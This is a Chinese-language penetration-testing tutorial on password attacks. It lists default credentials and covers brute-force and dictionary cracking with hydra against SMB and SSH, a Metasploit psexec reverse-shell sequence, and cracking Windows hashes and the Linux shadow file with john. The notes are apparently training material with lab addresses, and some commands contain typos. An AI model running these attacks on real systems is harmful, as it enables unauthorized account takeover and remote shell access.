一、口令安全现状
@ 弱口令
类似于123456、654321、admin123等常见的弱密码。
@ 默认口令
很多应用或者系统都存在默认口令。比如phpstudy的mysql数据库默认账密【root/root】,Tomcat管理控制台默认密码【tomcat/tomcat】
@ 明文传输
比如http、ftp、telnet等服务,在网络中传输数据流都为明文,包括口令认证信息等。这样的服务,又被嗅探的风险。
在线破解方式:账密需要认证
用户名未知
用户名已知
使用工具hydra
离线破解方式:密文还原成明文的过程。
二、暴力破解
暴力破解就是利用所有可能的字符组密码,去尝试破解。下表是根据不同位数生成密码的空间大小。
字符集 密码位数 密码空间
0-9 8位 10^8=100000000
0-9a-z 8位 36^8=2821109907456
三、字典破解
如果能通过合理的条件筛选或者过滤掉一些全字符组合的内容,就会大幅度降低破解的成本,我们把筛选出的密码组合成特定的字典,再用字典爆破密码也是可以的,但是这样做可能会漏掉真正的密码。密码字典大致分为以下几类。
@ 弱口令字典
比如123456、admin等这样的默认口令或弱口令
@ 社工字典
人们在设置密码的时候,为了便与记忆,密码的内容和组合会与个人信息有关,比如常见的密码组合“名字+生日、名字加手机”等
可以使用cupp工具,但是此工具是国外人开发的。
crunch工具的使用
四、window远程密码破解
使用hydra工具进行破解
-l 指定一个用户名
-p 指定一个密码
-L 指定一个用户名字典
-P 指定一个密码字典
-vV 显示爆破细节
-o 保存爆破结果
-f 找到正确的密码就停止爆破
-e
n null
s same
r 反向
远程爆破windows:hydra -l administrator -P pass.dic smb:// 127.0.0.1
远程爆破linux:hydra -L -P pass.dic 127.0.0.1 ssh
五、使用msf连接windows
在已知windows账密的情况下,可以使用msf对其进行连接,同时使用对方的命令行。
@ msfconsle
@ use exploit/windows/smb/psexec_psh
@ set payload windows/meterperter/reverse_tcp
@ set RHOSTS 172.16.132.145
@ set SMBUser ajest
@ set LHOST 172.16.132.128
@ exploit
六、John的使用
@windows hash 值破解
hashdump
windows hash 值破解一共需要两步操作。首先我们使用QuarksPwDump工具读取windows账户密码hash值,然后在使用john工具破解。
john win2k8.hash --format=NT --wordlist=/root/dic/pwd.dic(必须为绝对路径)
john win2k8.hash --show --format=NT
@linux口令破解
linux口令破解,也分远程破解与本地破解。远程破解主要是爆破ssh服务,属于在线密码攻击。本地破解需要拿到linux的shadow文件,进行hash值破解,属于离线密码攻击。
在线密码攻击:hydra -L /root/dic/user.dic -P /root/dic/pass.dic ssh://127.0.0.1 -vV -o 127.ssh
离线密码破解:使用john工具对shadow文件进行破解。
john shadow